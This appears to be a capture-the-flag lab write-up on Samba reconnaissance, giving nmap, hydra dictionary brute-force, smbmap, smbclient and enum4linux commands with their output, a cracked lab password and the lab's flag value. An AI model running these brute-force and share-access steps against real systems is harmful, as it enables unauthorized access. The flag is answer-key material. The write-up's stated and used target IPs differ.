🔬SAMBA

Lab 1

🔬 Samba Recon: Dictionary Attack
Target IP: 192.174.58.3
Brute-force of SAMBA service
Enumeration, brute-force, tools and flags have been already covered in this SMB Enum Lab 6

Enumeration

ip -br -c a

nmap -sV 192.34.128.3

139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: RECONLABS)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: RECONLABS)

📌 Server is running SAMBA on the standard port 445

Brute-Force

gzip -d /usr/share/wordlists/rockyou.txt.gz

hydra -l admin -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.34.128.3 smb

[445][smb] host: 192.34.128.3   login: admin   password: password1

Use SMBMap tool

smbmap -H 192.34.128.3 -u admin -p password1

Disk  Permissions
----  -----------
shawn  READ, WRITE
nancy  READ ONLY
admin  READ, WRITE
IPC$   NO ACCESS

Use smbclient tool to access Samba sources

smbclient -L 192.34.128.3 -U admin

smbclient //192.34.128.3/shawn -U admin

help
dir
# check files and folders in that share

smbclient //192.34.128.3/nancy -U admin

cd dir\
get flag
exit

smbclient //192.34.128.3/admin -U admin

cd hidden
get flag.tar.gz
exit

tar xzf flag.tar.gz
cat flag

Use enum4linuxtool

enum4linux -a 192.34.128.3
# a = enumerate all information

enum4linux -a -u admin -p password1 192.34.128.3

Reveal Flag: 🚩

2727069bc058053bd561ce372721c92e

Previous🔬SSH Next🔬Cron Jobs

Last updated 2 years ago

Was this helpful?

Lab 1

Enumeration

Brute-Force

Login and Enumeration